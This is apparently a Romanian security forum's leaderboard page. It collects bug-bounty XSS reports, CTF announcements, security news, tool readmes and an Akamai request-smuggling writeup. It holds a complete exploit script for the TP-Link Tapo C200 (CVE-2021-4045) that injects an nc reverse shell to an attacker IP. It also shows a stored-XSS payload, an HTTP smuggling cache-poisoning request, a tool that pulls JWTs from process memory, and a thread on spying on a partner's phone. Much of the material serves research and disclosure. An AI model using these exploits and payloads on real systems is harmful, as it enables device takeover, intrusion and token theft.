Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation since 09/07/22 in all areas

  1. Salut. Am gasit doua vulnerabilitati XSS in aplicatiile detinute de cei de la Microsoft. Una este in Outlook, iar a doua intr-o alta aplicatie folosita si cunoscuta de multi... nu pot da detalii momentan deoarece nu a fost rezolvata nici una pana acum... Cel putin, nu am primit duplicat pe rapoartele trimise. 🙂 1. XSS reflected (without user interaction) - [*].live.com: 2. XSS reflected (user interaction required) - Outlook: Am observat ca si domeniile acestea sunt vulnerabile: office365.com si live.com.
    10 points
  2. Am crezut ca e reclama la bitdefender 🤣 deci concluzia e ca tot ce se intampla rau pe lumea asta se trage de la rusi. Ai naiba, de scarbele de americani nu zice nimeni nimic. Intreaga europa a devenit o colonie lingatoare de gaoaze americane
    6 points
  3. Vulnerabilitatea din [*].live.com. Azi am primit mesaj. Nu ma asteptam asa repede la un raspuns. 🙂 L.E: Au si reparat-o... LOL. Am verificat acum 😅
    5 points
  4. asta e bagpulist care nu da limbi femeii. D'aia se duce dom'le dupa altii 🤣
    5 points
  5. :))))))))))))))) Tu ai stricat google! Roman, windows in spaniola (ia uite, BUSCAR cica), ip de NL si te arata prin UK Pe unele servere nu sunt actualizate librariile GeoIP. Adresele IP se pot seta pe ce tara vor furnizorii. (ownerul lor)
    4 points
  6. https://adevarul.ro/stiri-interne/evenimente/inchisoare-pe-viata-pentru-luptatorul-k1-care-a-2209265.html?
    4 points
  7. Salut, sunt baiatul din Republica Moldova si o sa va raspund la cateva intrebari pe care le-ati avut la momentul dat. 1. Nu eu eram analfabetul(sunt din Brasov dar stau in RM) 2. Nu aveam vreun scop de a luat bani etc, eram doar niste copii prosti ce n-aveau ce face cu timpul lor si am platit destul pentru asta. 3. Nu am fost niciodata de acord cu mesajul insa unul din baieti a insistat pe subiect, puteti observa ca tot el e cel ce a scris tot pe deface. 4. Am fost prins deoarece unul dintre baieti (cel ce scria pe deface-uri) vorbea mereu in public si se lauda cu chestiile facute, de la el a dat politia de mine pentru ca avea numarul meu de telefon (eu prost) Deci da, cel putin eu eram un copil prost care nu avea ce face, fara intentii rele (credeam eu). Sper ca v-am lamurit in cazul in care INCA era curios cineva care a fost faza. Stay legal!
    4 points
  8. They are the winners from the last edition of DefCamp Capture the Flag (D-CTF) competition. Wondering how your name could get on the D-CTF 2022 leaderboard (win prizes totaling EUR 4,500 & get free tickets to DefCamp 2022)? Just follow these 3 easy steps: 1. Get your team together & register for the D-CTF 2022 Qualifications - not to put any pressure, but there is only one week left! 😱 WHEN? Starting September 30th, 09.00 UTC Until October 1st, 15.00 UTC WHERE? Online, on CyberEDU.ro Register: https://dctf22-quals.cyberedu.ro/ 2. Hack before getting hacked & make it in the top 10 shortlist that will be attending the finals during the DefCamp conference in Bucharest. P.S. Up to 5 teams from Romania will also be invited in the final. 3. Join us at DefCamp on November 10-11 in Bucharest & do your absolute best in the D-CTF 2022 finals! Register: https://dctf22-quals.cyberedu.ro/ See you soon! The DefCamp team
    4 points
  9. Nu ati inteles voi intrebarea. Fac eu o traducere: La el la scoala, in laboratotul de informatica, cum sa faca el sa stie pe ce site-uri se uita ceilalti elevi/profesori? In reteaua locala sa hackuiasca sa stie ce acceseaza ceilalti useri (parole, siteuri, mesasje, tot, tot) Asa e? Am inteles bine?
    3 points
  10. Intrebarea aceasta mi-a fost adresata de multa lume, chestia este ca eu nici macar nu stiam despre spitale, am aflat-o abia dupa ce am ajuns la DIICOT (eu fiind deja retras de vreo 2 luni din gruparea respectiva din cauza lipsei de timp), ulterior am vazut si dovezile si intr-adevar baietii ramasi acolo planuiau sa blocheze sistemele informatice ale spitalelor din motive inexplicabile pentru mine, sunt multe chestii si decizii luate de ei in absenta mea pe care nu le am inteles iar aceasta ar fi unul dintre ele. Dupa ce am fost prins in Moldova, am mers la Procuratura pentru Combaterea Criminalității Organizate și Cauze Speciale din Chisinau, am stat acolo ceva timp, dupa care peste ceva luni am fost la DIICOT in Bucuresti, a fost o procedura lunga, plina de stres si emotii nasoale care au durat cam un an. Intr-un final am reusit sa scap cu niste lucru in folosul comunitatii din singurul motiv (cred eu) ca procurorii de la DIICOT au fost de treaba cu mine si pentru ca eram minor (mai aveam o luna pana la 18 ani). O experienta nasoala la acel moment insa extrem de buna pentru timpurile de acum / cele care vin, am capatat o gramada de oportunitati de lucru si am reusit sa mi schimb total mentalitatea in legatura cu `distrugerea` si facutul chestiilor ilegale, le poti face daca esti pasionat insa totul poate fi legal, fara vreun risc care ti-ar putea distruge viitorul. O lectie foarte importanta pentru mine pe care am invatat-o `the hard way` 😁.
    3 points
  11. GTA 6 source code and videos leaked after Rockstar Games hack By Lawrence Abrams September 18, 2022 Grand Theft Auto 6 gameplay videos and source code have been leaked after a hacker allegedly breached Rockstar Game's Slack server and Confluence wiki. The videos and source code were first leaked on GTAForums yesterday, where a threat actor named ‘teapotuberhacker’ shared a link to a RAR archive containing 90 stolen videos. The videos appear to be created by developers debugging various features in the game, such as camera angles, NPC tracking, and locations in Vice City. In addition, some of the videos contain voiced conversations between the protagonist and other NPCs. RAR archive containing the 90 leaked GTA 6 videos The hacker claims to have stolen "GTA 5 and 6 source code and assets, GTA 6 testing build," but is trying to extort Rockstar Games to prevent further data from being released. However, the threat actor says they are accepting offers over $10,000 for the GTA V source code and assets but are not selling the GTA 6 source code at this time. Selling GTA V source code on Telegram Source: BleepingComputer After forum members showed disbelief that the hack was real, the threat actor claimed he was behind the recent cyberattack on Uber and leaked screenshots of source code from both Grand Theft Auto V and Grand Theft Auto 6 as further proof. Rockstar games have not released a statement or responded to our email about the attack at this time. However, Bloomberg's Jason Schreier confirmed the leak was valid after speaking to sources at Rockstar. The leaked videos have since made it onto YouTube and Twitter, with Rockstar Games issuing DMCA infringement notices and takedown requests to get the videos offline. Leaked GTA 6 video taken down on YouTube Source: BleepingComputer "This video is no longer available due to a copyright claim by Take 2 Interactive," reads a copyright claim by Take 2 Interactive, the owner of Rockstar Games. These takedown demands lend further validity to the fact that the leaked GTA 6 videos are real. However, Rockstar Game's efforts come too late, as the threat actor and others had already started leaking the stolen GTA 6 videos and portions of the source code on Telegram. For example, the threat actor leaked a GTA 6 source code file today that is 9,500 lines long and appears to be related to executing scripts for various in-game actions. Claims to be behind Uber attack The hacker hasn’t shared details on how they gained access to the GTA 6 videos and source code other than claiming to have stolen them from Rockstar’s Slack and Confluence servers. The threat actor also claims to be the same hacker, named 'TeaPots,' behind the recent Uber cyberattack, but BleepingComputer could not confirm whether these claims are valid. However, during the cyberattack on Uber, the threat actor also gained access to the company's Slack server and other internal services after performing a social engineering attack on an employee. While there are not enough details about the Rockstar Games hack, the types of servers accessed and the very public announcements are similar to the Uber hacker’s tactics. Sursa: https://www.bleepingcomputer.com/news/security/gta-6-source-code-and-videos-leaked-after-rockstar-games-hack/
    3 points
  12. La vârsta asta ,e mai bine sa nu știi ! Stai liniștit !
    3 points
  13. Ascultam asta si pe la minutul 3-8 omul vb de faptul ca romania a fost leading nation la programul de implementare a securitatii cibernetice pentru Ucraina ? Oricum tare podcastul.
    2 points
  14. Nice, felicitari! BTW (out of scope): https://api.partnercenter.microsoft.com/insights/v1/mpn/swagger/index.html?configUrl=https://pentesting.syzhack.com/swg/test.json
    2 points
  15. # Exploit Title: TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE) # Date: 02/11/2022 # Exploit Author: hacefresko # Vendor Homepage: https://www.tp-link.com/en/home-networking/cloud-camera/tapo-c200/ # Version: 1.1.15 and below # Tested on: 1.1.11, 1.1.14 and 1.1.15 # CVE : CVE-2021-4045 # Write up of the vulnerability: https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce import requests, urllib3, sys, threading, os urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) PORT = 1337 REVERSE_SHELL = 'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f' NC_COMMAND = 'nc -lv %d' % PORT # nc command to receive reverse shell (change it depending on your nc version) if len(sys.argv) < 3: print("Usage: python3 pwnTapo.py <victim_ip> <attacker_ip>") exit() victim = sys.argv[1] attacker = sys.argv[2] print("[+] Listening on %d" % PORT) t = threading.Thread(target=os.system, args=(NC_COMMAND,)) t.start() print("[+] Serving payload to %s\n" % victim) url = "https://" + victim + ":443/" json = {"method": "setLanguage", "params": {"payload": "';" + REVERSE_SHELL % (attacker, PORT) + ";'"}} requests.post(url, json=json, verify=False) Source
    2 points
  16. Escalating SSTI to Reflected XSS using curly braces {} Hello everyone! My name is Sagar Sajeev and this is my writeup explaining how I was able to escalate a Server Side Template Injection (P4) to a much more severe XSS. Note: For those who haven't heard of Server Side Template Injection or SSTI, I’ll recommend you to get some understanding about SSTI before reading this writeup. I’ve made a specific writeup explaining SSTI. You can check it out by clicking here. Basically, it’s a way to inject something(payload) into the template engine which in turn gets executed on server side. Target Scenario After hours of hardwork of trying to find an endpoint vulnerable to XSS, I finally came to an one which seemed interesting to me. It was exposing a sign up page. What was interesting about this was, it was kept hidden. The url looked something like: https://www.redacted.com/engine/signup/create.php I tried XSS payloads there, but it was filtering everything. It was then I thought of adding curly braces {} to the first name, last name and address field. To my surprise, all three of the fields did not carry out any specific filtering for curly braces. I tried the following payload:- {{ &lt;svg/onload=prompt(&quot;XSS&quot;)&gt; }} I know the payload looks complicated. It’s just that all entities are URL-encoded. This is how decoded payload looks: {{ <svg/onload=prompt(“XSS”)> }} The thing is that, direct payload was not going through for some reason. I had to intercept the request using burp and then add the encoded payload. XSS was fired. Well, the thing is that this is just self-XSS. Self XSS to Stored XSS The target website had a section where you could create projects. Think of the project as a folder where you can store files. The project admin can share this to other “authenticated users”. The project must be given a name and is shared using a link. Well, I named the project with the payload. Thus, now the file name is:- {{ &lt;svg/onload=prompt(&quot;XSS&quot;)&gt; }} Insane bruh moment. No File name restrictions were kept and I could name the project in however way I want. Copy the share project link and sent it to other authenticated users. As I mentioned before, only authenticated users can view the project. So, the application forces the user to login before being able to see the shared project. When an authenticated user clicks on the link, Voilà and here it is! The XSS pop-up. Quick Recap SSTI based Self-XSS payload was created. Self-XSS was escalated to Reflected XSS (differs according to attack scenario). SSTI → Self XSS → Reflected XSS This ,in fact, could be escalated to more severity. The attacker could just create a project and share its link on social media. If ,by chance an authenticated user randomly clicks on the link, XSS could be triggered. My SSTI writeup can be found here:- https://sagarsajeev.medium.com/server-side-template-injection-something-distinct-f0ac234e379 Tips:- Make sure you spend time understanding the target. I spent nearly a week on this target to find this. Don’t keep on changing from one program to another just because you aren’t able to find a specific bug. Make a list of vulnerabilities you have learned and test each of them accordingly. Also, make sure to explain the impact to the highest severity. Let them know of the most potential impact that the vulnerability could have. I recommend you to make notes. May it be handwritten or in Notion. Make sure that you take notes. It will help in the long run. Timeline Submitted : 18–09–2022 Accepted : 19–09–2022 Rewarded with Amazon gift card : 22–09–2022 I do occasionally share some tips about Bug Bounties and related stuff over at my Twitter and LinkedIn handle. So do follow me there. If you’ve got any queries, feel free to message me. I will be more than happy to help. LinkedIn : https://www.linkedin.com/in/sagar-sajeev/ Twitter : https://twitter.com/Sagar__Sajeev Thanks for going through my writeup and I hope it was useful to you. I’ve made many other writeups on my Medium handle. Please do check those out as well. Happy Hunting! Sursa: https://sagarsajeev.medium.com/escalating-ssti-to-reflected-xss-using-curly-braces-825685bd93ec
    2 points
  17. The repository tries to gather an information about Windows persistence mechanisms to make the protection/detection more efficient. Most of the information is well known for years, being actively used within various scenarios. Expect more. I am doing my best to add new entries each day. How it works. And how to contribute. 👨‍💼 HKCU Run and RunOnce registry keys 👨‍💼 ⚙ Task Scheduler ⚙ Image File Execution Options key ⚙ Windows Services AeDebug WER Debugger * ⚙ Natural Language Development Platform 6 DLLs * ⚙ GPO Client-side Extension ⚙ Filter Handlers for Windows Search Disk Cleanup Handler 👨‍💼 .chm helper DLL * hhctrl.ocx * ⚙ AMSI Providers ⚙ ServerLevelPluginDll Password Filter Credential Manager DLL ⚙ Authentication Packages Code Signing DLL 👨‍💼 HKCU cmd.exe AutoRun ⚙ LSA Extension ⚙ Winlogon Notification Package ⚙ Print Monitor 👨‍💼 HKCU Load MPNotify ⚙ Windows Platform Binary Table Explorer tools * 👨‍💼 Windows Terminal Profile 👨‍💼 Startup Folder 👨‍💼 User Init Mpr Logon Script * ⚙ Autodial DLL * .NET Startup Hooks 👨‍💼 PowerShell Profiles 👨‍💼 TS Initial Program Want more? Check the list tomorrow. * Based on a research made by @Hexacorn - one of the best persistence hunters. ⚙ It is enough to turn computer on to make the code run. 👨‍💼 End-user can do it. Sursa: https://persistence-info.github.io/
    2 points
  18. Salut, Nu stiu daca esti serios sau nu, dar chestia asta de o ceri tu tine de securitate. Fara a avea un bug/vulnerabilitate in youtube nu cred ca ai vreo sansa sa accesezi un video private (deaia e private). Si daca ar fi cazul de asa ceva sigur cineva ar cere o suma destul de considerabila pentru un astfel de serviciu, daca nu chiar ar cere bani per video. Bafta si daca gasesti sa ne anunti si pe noi
    2 points
  19. Poate inventeaza astia o functie ca atunci cand te suna pe telul de acasa, sa redirectioneze apelul pe alt nr....
    2 points
  20. @iulikastea de la siteul cu psiholoage arata de zici ca sunt alea de pe sentimente.ro din 2008. Cred ca nikc-ul lui Raveno apare pe www.crestinortodox.ro Nu sunt crestin practicant, dar la recensamant m-am declarat ortodox. Sper ca nu ai gasit-o pe forum acolo. Succes. Acum serios vorbind, un sfat prietenesc. Daca nu te inseala si tu o tot banuiesti, inseamna ca esti gelos, iar daca ti se va confirma ca te-a inselat atunci chiar nu vei mai putea trai cu gandul. Mai era mai demult cineva care zicea ca sterge mesajele, poti cauta dupa topicuri mai vechi pe aceeasi tema. Stiu ca @Chese chinuia sa builduiasca un rat android scris cu c#, insa doar in scopuri educationale. Cel mai bine ar fi sa iei viata in piept si sa o confrunti direct. Sa presupunem prin absurd ca ai instala softul pe telefon si ti s-ar confirma banuielile. Ai avea curajul sa o confrunti si sa ii prezinti dovezile?
    2 points
  21. Am dat si recuperara parola ca sa dau reply 🤣 da se poate, de la 1 la 6 luni sau amenda de la 6.000 de lei.
    2 points
  22. Ce rau imi pare ca s a scos react ul de haha. Degeaba ii raspundeti omului ca 99% n o sa mai intre pe forum, o fi cautat "cum s o hecuiesc pe nevasta mea tutorial simplu in romana" si i a aparut rst
    2 points
  23. Da mi mie $20 ca sa iti pun sigur ca te insala Si vezi ca e fapta penala asta ce vrei tu, stau multi prosti la bulau pt acces ilegal la conturi.
    2 points
  24. Ia-ti una mai batrana (79 de ani) sa nu iti pese ce face si apoi mai primesti bonus si mostenire.
    2 points
  25. Parental Control, il pune pe mod avion, ii cumperi un fard in fapt
    2 points
  26. Surely you’ve been expecting our email about the DefCamp conference, right? We are happy to officially announce that we’re back with DefCamp - the offline edition, this fall, as we've become accustomed to over the last 10 years. Registrations are NOW OPEN, which means you can book your early bird ticket right now! Ready, steady, gooooo pack your bags and cyber knowledge for #DefCamp12! https://def.camp/tickets/ WHEN: 10th-11th November, 2022 WHERE: Bucharest, Romania Call for papers: https://def.camp/call-for-papers/ Call for contsts: https://def.camp/call-for-contests/ Become a volunteer: https://def.camp/become-a-volunteer/ Website: https://def.camp/
    1 point
  27. Tracee is a Runtime Security and forensics tool for Linux. It uses Linux eBPF technology to trace your system and applications at runtime, and analyzes collected events in order to detect suspicious behavioral patterns. It is usually delivered as a docker container, but there are other ways you can use it (even create your own customized tracee container). Watch a quick video demo of Tracee: Check out the Tracee video hub for more videos. Documentation The full documentation of Tracee is available at https://aquasecurity.github.io/tracee/dev. You can use the version selector on top to view documentation for a specific version of Tracee. Quickstart Before you proceed, make sure you follow the minimum requirements for running Tracee. 1. Running tracee:latest docker run \ --name tracee --rm -it \ --pid=host --cgroupns=host --privileged \ -v /etc/os-release:/etc/os-release-host:ro \ -e LIBBPFGO_OSRELEASE_FILE=/etc/os-release-host \ aquasec/tracee:latest 2. Running tracee:full docker run --name tracee --rm -it \ --pid=host --cgroupns=host --privileged \ -v /etc/os-release:/etc/os-release-host:ro \ -e LIBBPFGO_OSRELEASE_FILE=/etc/os-release-host \ -v /usr/src:/usr/src:ro \ -v /lib/modules:/lib/modules:ro \ -v /tmp/tracee:/tmp/tracee:rw \ aquasec/tracee:full The default (latest) image is lightweight and portable. It is supposed to support different kernel versions without having to build source code. If the host kernel does not support BTF then you may use the full container image. The full container will compile an eBPF object during startup, if you do not have one already cached in /tmp/tracee. You may need to change the volume mounts for the kernel headers based on your setup. See Linux Headers section for more info. Tracee supports enriching events with additional data from running containers. In order to enable this capability please look here. These docker commands run Tracee with default settings and start reporting detections to standard output. In order to simulate a suspicious behavior, you can simply run: strace ls in another terminal. This will trigger the Anti-Debugging signature, which is loaded by default, and you will get a warning: INFO: probing tracee-ebpf capabilities... INFO: starting tracee-ebpf... INFO: starting tracee-rules... Loaded 14 signature(s): [TRC-1 TRC-13 TRC-2 TRC-14 TRC-3 TRC-11 TRC-9 TRC-4 TRC-5 TRC-12 TRC-8 TRC-6 TRC-10 TRC-7] Serving metrics endpoint at :3366 Serving metrics endpoint at :4466 *** Detection *** Time: 2022-03-25T08:04:22Z Signature ID: TRC-2 Signature: Anti-Debugging Data: map[] Command: strace Hostname: ubuntu-impish Trace In some cases, you might want to leverage Tracee's eBPF event collection capabilities directly, without involving the detection engine. This might be useful for debugging, troubleshooting, analysing, researching OR education. Execute docker container with the word trace as an initial argument, and tracee-ebpf will be executed, instead of the full tracee detection engine. docker run \ --name tracee --rm -it \ --pid=host --cgroupns=host --privileged \ -v /etc/os-release:/etc/os-release-host:ro \ -e LIBBPFGO_OSRELEASE_FILE=/etc/os-release-host \ aquasec/tracee:latest \ trace Components Tracee is composed of the following sub-projects, which are hosted in the aquasecurity/tracee repository: Tracee-eBPF - Linux Tracing and Forensics using eBPF Tracee-Rules - Runtime Security Detection Engine Tracee is an Aqua Security open source project. Learn about our open source work and portfolio Here. Join the community, and talk to us about any matter in GitHub Discussion or Slack. Download: tracee-main.zip or git clone https://github.com/aquasecurity/tracee.git Source
    1 point
  28. https://community.tp-link.com/en/smart-home/forum/topic/542494
    1 point
  29. How an Akamai misconfiguration earned us USD 46.000 FRANCESCO MARIANI SEPTEMBER 17, 2022 A few months ago me and my friend Jacopo Tediosi made an interesting discovery about an Akamai misconfiguration that allowed us to earn more than 46,000 dollars. Our research highlighted how manipulating a particular HTTP header made it possible to change the way how proxies communicated with each other and how this allowed us to perform different request smuggling attacks or, in particular cases, allowed us to poison the cache with arbitrary content chosen by us. In this post we will go directly into detail without explaining how these vulnerabilities work in general, hoping that the reader knows what we are talking about. If not, there are so many resources online and even labs to practice with them. Now the question is: how were we able to reveal the misconfiguration? and how was it actually handled by major bug bounty platforms and private companies? Even today you can encounter this header in the response in several Server under the Akamai network. Probably many of you have already understood or had already tried to force the use of Content-Length instead of Transfer-Encoding. But let’s go one step at a time. Once we noticed this particular thing, any attempt to abuse the Connection header with Content-Length as a value to perform a Request Smuggling attack didn’t work. One curious thing we noticed was some unusual responses being provided by Akamai, such as [no URL]. Or, with www.example.com: if we use the same host, the server actually provided different responses, but as many will know it is difficult to determine if it was actually Request Smuggling, HTTP Pipelining, or a normal server behavior by setting the Connection header in keep-alive. Trying to redirect the requests with my co-worker we actually found that it worked. But currently, we only had one potential Denial of Service which is often rejected for lack of impact. Once this was done, we did some tests from a different network to verify that it was an open desync. Only later we discovered that by inserting other host within the Akamai network we were completely able to redirect each other and finally we had a complete request smuggling. This sounds good, but we had a problem. We don’t have a host within Akamai network. How can you prove that through the attack you can arbitrarily redirect users if you don’t have any logs to show? As we continued to try, and luckily for us, we were able to abuse this bug to arbitrarily cache content from other hosts. We also found that, in addition to the GET method, we could use the OPTIONS method to perform the desired attack, moreover, there were more chances that Akamai would not notice that the request was actually malicious. To poison the cache, it was necessary to send a first GET or OPTIONS request to a nonexistent path (also to avoid damage to the platform), preferably with static resource extensions (more likely to be taken from the cache), with the second request to arbitrary hosts. After a couple of requests, the content of the second host’s file was correctly cached due to its revalidation, like this: From then on it was possible to visit the URL /it/it/medusa.txt which returned the robots.txt of the second host. Obviously, the content we decided to cache was not malicious but we could cache many types of files such as html or js. Finally, we had a nice impact for the report. POC: OPTIONS /random.txt HTTP/1.1 Host: ORIGINAL-HOST Connection: Content-Length Content-Length: 42 GET /robots.txt HTTP/1.1 Host: ARBITRARY-AKAMAI-HOST x: 1 by sending the request twice it was possible to cache the contents of robots.txt of the second host. As soon as the discovery was made, we started responsible disclosure, reporting the vulnerability to Akamai. We have not received immediate confirmation from them. While we waited, we realized that not all Akamai hosts were vulnerable or some did not allow arbitrary content caching (they probably had no cache or particular cache key settings that did not allow the attack). We thought maybe it was some general misconfiguration and decided to report it in bug bounty platforms as well. Vulnerability management by bug bounty platforms: Our sincere admiration for the triagers of the Hackerone platform. After a very short time, they were able to replicate and understand the vulnerability by assigning the right severity. Unfortunately, in Bugcrowd many of the triagers were unable to replicate the vulnerability despite providing a oneliner with curls, video POC, screenshots, and more. Some just didn’t put the two blank lines in GET requests, others had wrong burp targets and we have also received duplicated (?). like: We were very disappointed with the Bugcrowd triagers. Microsoft: Microsoft replied very late, saying it was unable to replicate the vulnerability (Akamai had already introduced the security fix). Apple: Apple responded late, and was unable to replicate the vulnerability due to Akamai’s fix. They were very kind and we received thanks by email, but no bounty was paid (we didn’t want any). Intigriti: We only filed a bug, the triager was very nice and friendly, but he gave us a duplicated. THE FIX: Akamai took very little time to get the security fix after our report, now any attempt to use the Connection header in an inappropriate way is automatically blocked. Akamai has given us permission to make a public disclosure. Sursa: https://blog.hacktivesecurity.com/index.php/2022/09/17/http/
    1 point
  30. AzTokenFinder Is a small tool to extract JWT (or JWT like looking data) from different processes, like PowerShell, Excel, Word or others. The idea was from another tool which I read about on Twitter, but I could not find it anymore. Maybe someone could give me a hint. AzTokenFinder.exe --help --processname Names of process you want to parse. Please omit the ".exe". --processids ProcessIDs you want to parse. --default Enumerate Edge, Excel, Word, PowerShell, Teams, Onedrive and PowerPoint. --showexpiredtokes (Default: false) Shows expired tokens. --help Display this help screen. --version Display version information. How does it work There is nothing special in it. It simply opens the processes you provide and searches through the memory for JWT like looking data and extracts them. Note It currently only works with x64 processes and it does not extract refresh tokens currently. Maybe I'll change this later. Sursa: https://github.com/HackmichNet/AzTokenFinder
    1 point
  31. WireSocks for Easy Proxied Routing Reading time ~9 min Posted by Michael Kruger on 30 September 2022 Categories: Networking, Offence, Vpn, Windows I built some infrastructure that you could deploy and use to easily tunnel from arbitrary sources over a proxy such as SOCKS, using anything that can run WireGuard. This is convenient in cases where it would be nicer to have a full network route to a target network (with working DNS) vs just having application specific proxy rules. In this post I’ll elaborate a bit on that idea. If you are just looking for the code you can find it here: https://github.com/sensepost/wiresocks. Introduction We often get into a position where some sort of internal device has been compromised and you want to take it further. This involves getting network traffic through your compromised device via a SOCKS proxy. SOCKS proxies are everywhere and there are many examples of Cobalt Strike or Metasploit being used to proxy traffic through an agent or tools like ReGeorg, Pivotnacci or Chisel being used to proxy traffic via a compromised web server or similar. Existing solutions Once you have a SOCKS proxy setup, that is usually when good old reliable proxychains-ng comes into the picture where you’d use it to tunnel the majority of your tooling through the proxy. However, recently a lot of really nice tools have been released which have been made to run on Windows. This comes with the issue of how are we going to trick these Windows applications into using our proxy. The SpectorOps team wrote an excellent post detailing how to use software such as Proxifier and Proxycap on Windows to force your tools to use your proxy. If you haven’t, go read it! Unfortunately, in some edge cases those tools fail or become annoying by not catching all the traffic as you’d like. Having this happen a few times, I was struck with some inspiration. Why not do the redirection at a network level and avoid all the weird Windows nuances? Network Level Proxying Luckily for me there already was a project that handled this called tun2socks (originally I used RedSocks, but @RoganDawes showed me tun2socks which removes some of the iptables complexity in RedSocks) which is really just some Golang magic together with some routes that lets you redirect traffic into a tun device and have it push traffic through your SOCKS proxy. This seemed like a great idea, except every time you would want to use it for your Windows machine you would have to setup a Linux router with this installed and route your Windows machine through it. This would be more effort than Proxyfier, I felt. Turns out, we have this easy network tooling that runs on Windows (amongst others) that takes your traffic from one point to another called VPNs. More specifically in this instance I used WireGuard which is an awesome simple VPN that has clients for all manner of operating systems. WireSocks Glueing those two services together, ie. tun2socks and Wireguard, we can connect arbitrary clients via Wireguard and route traffic into a SOCKS proxy and into client networks. High level architecture diagram for WireSocks Using this setup, we can now interact with a remote network, using a traditional network route, complete with DNS resolution (more on that in a moment!). Listing of a Domain Controller’s shared folders via a SOCKS proxy exposed using Cobalt Strike, leveraging WireGuard and tun2socks to reach it. To make getting up and running even simpler I did some searching for docker containers to handle some of the work for me. I found that tun2socks also had a container, xjasonlyu/tun2socks and linuxserver/wireguard which I had previously used for my own WireGuard server. I did some editing of the tun2socks docker container with a simpler entry point to our use case. Using docker compose to glue the services together and to set this up quickly on a jump box, I gave it a test and was able to get SeatBelt.exe into the network from my own Windows VM just by connecting to the WireGuard VPN. \o/ Running SeatBelt on a remote host, inside the compromised network over our WireGuard tunnel, via a SOCKS proxy. DNS via WireSocks There is one problem though, UDP traffic is not working great (even though SOCKS5 supports it), which causes issues as DNS is over UDP. After fighting with tunnelling UDP traffic and eventually working out that the specific SOCKS proxy I was using did not support UDP I opted to setup a DNS server which would take UDP requests and forward them on as TCP. This was very easy as the linuxserver/wireguard docker had CoreDNS as its own DNS server for WireGuard clients. After looking at CoreDNS’ plugins I discovered the forward plugin supported an option to force TCP. This means that if the client uses the WireGuard CoreDNS server the request would be converted to TCP and would then be captured by tun2socks solving the issue. Once again I went for an allow list approach so that we can specify which DNS requests get forwarded through the SOCKS proxy so that we don’t spam the victims internal DNS with random requests. An example Corefile follows: # Domain that you would like to convert to TCP so that # it gets pushed through tun2socks example.zzz { loop log # Change IP to that of the internal DNS server you want to use. forward . 123.123.123.123:53 { force_tcp } } Bringing it all together To get this all setup easily, I created a basic Dockerfile based off the one in the tun2socks repo so that it would take my own entrypoint.sh. My entrypoint removed a lot of the iptables marks in the original and instead just parses some environment variables such as $TUN_INCLUDED_ROUTES to add routes in the docker container running tun2socks. config_route() { for addr in $(echo "$TUN_INCLUDED_ROUTES" | tr ',' '\n'); do ip route add $addr dev $TUN done } This docker now would setup the TUN interface and the configured routes would be redirected into the TUN and therefore into the SOCKS proxy. Now I just needed to run the second WireGuard docker and get it to use the same routes as well as have access to the network namespace of the tun2socks docker so it could use the TUN interface. Or I could just add a WireGuard server to the tun2socks docker. Turns out the first option is easier. It is possible to tell a docker to use the network namespace of another container when it gets setup. This is done by specifying container:container_name as a --net option like below: docker run -it --rm --net container:wiresocks alpine /bin/sh The above command would run an alpine container but its network stack would be the same as the wiresocks container which includes all the routes as well as the TUN interface. This allows you to generically add any dockerised tools into that namespace which would obey the routes and essentially be SOCKS’d via the proxy. This means you can bring any docker container into the same namespace and have it access the same network! Using the same namespace trick to attach a docker container with impacket tools installed to use the same socks proxy hack. Going back to WireGuard I created a docker-compose that handles most of the setup for you so that you can have any client machine get routed via SOCKS transparently: https://github.com/sensepost/wiresocks/blob/main/docker-compose.yml Getting started with Wiresocks Using WireSocks should be pretty simple. You need a host (say a jump box), a proxy (such as SOCKS) into your target network (your jump box should be able to reach it), and docker compose installed. Then, clone the WireSocks repository, copy the example .env.example file to .env, edit it appropriately and run docker compose up -d. With the stack up and running, you should see a new config/ directory which will contain the WireGuard client configuration files you’d need to configure on your clients (like Windows, Linux, macOS etc.). Conclusion So all of this provides a generic way to get a computer’s TCP traffic into a SOCKS proxy without too much funny business. UDP support is something that the SOCKS proxy would need support for and it also needs to play nicely with tun2socks, so if someone can figure that out before me, please let me know! The tool/docker can be found here: https://github.com/sensepost/wiresocks Hopefully this helps some people who have been frustrated by their tools not using their SOCKS. Sursa: https://sensepost.com/blog/2022/wiresocks-for-easy-proxied-routing/
    1 point
  32. @alezu2000 vezi pe skype 🤗
    1 point
  33. A Microsoft logo sits illuminated at the World Mobile Congress at the Fira Gran Via Complex on Feb. 22, 2016, in Barcelona, Spain. (Photo by David Ramos/Getty Images) Researchers on Tuesday reported that this past August they identified an attack path that lets malicious actors with file system access to steal credentials for any Microsoft Teams user who’s logged-on. In a Sept. 13 blog post, the Vectra Protect team said because attackers do not require elevated permissions to read these files, it exposes this potential concern to any attack that provides malicious actors with local or remote system access. The researchers said this vulnerability impacted all commercial and Government Community Cloud Desktop Team clients for Windows, Mac and Linux. Microsoft has been made aware of this issue and closed the case in late August, stating that it did not meet its bar for immediate servicing. The Vectra researchers said until Microsoft moves to update the Teams Desktop Application, they don’t recommend using the full Teams client and advise customers to consider using the web-based Teams application exclusively. The researchers said security teams should use the web-based Teams client inside Microsoft Edge, which has multiple OS-level controls to protect token leaks. They said the Teams web application is robust and supports most features enabled through the desktop client, keeping the organization’s productivity impacts to a minimum. For customers that must use the installed desktop application, the researchers said it’s critical to watch key application files for access by any processes other than the official Teams application. When asked Thursday if the situation had changed, Aaron Turner, CTO, SaaS Protect at Vectra, said to the Vectra team’s knowledge, Microsoft had not changed its stance. Turner said in Vectra’s interactions with customers, only those organizations with extreme exposure to sophisticated adversaries (defense contractors, critical infrastructure operators) are seriously considering eliminating the Teams.exe application on endpoints and forcing users to collaborate through Teams via a managed browser. Turner said most of the organizations he has talked to plan on implementing an endpoint detection and response monitoring policy to watch for any situations of unauthorized access by a system process to the file storage locations where the tokens are stored. Turner added that the work Vectra’s Connor Peoples spearheaded to discover this vulnerability and coordinate his findings with Microsoft is part of Vectra's efforts to help make the Microsoft 365 ecosystem a safer and fairer place for any organization to communicate and collaborate. As outlined in the research, Turner said there are some improvements that Microsoft can make to shore up the Electron application for Windows and MacOS. He said those improvements should also help prevent future vulnerabilities, such as other recently disclosed problems relating to XSS attacks and potential command and control activity using GIFs. Sammy Migues, principal scientist at Synopsys Software Integrity Group, said like every application framework, Electron has its own 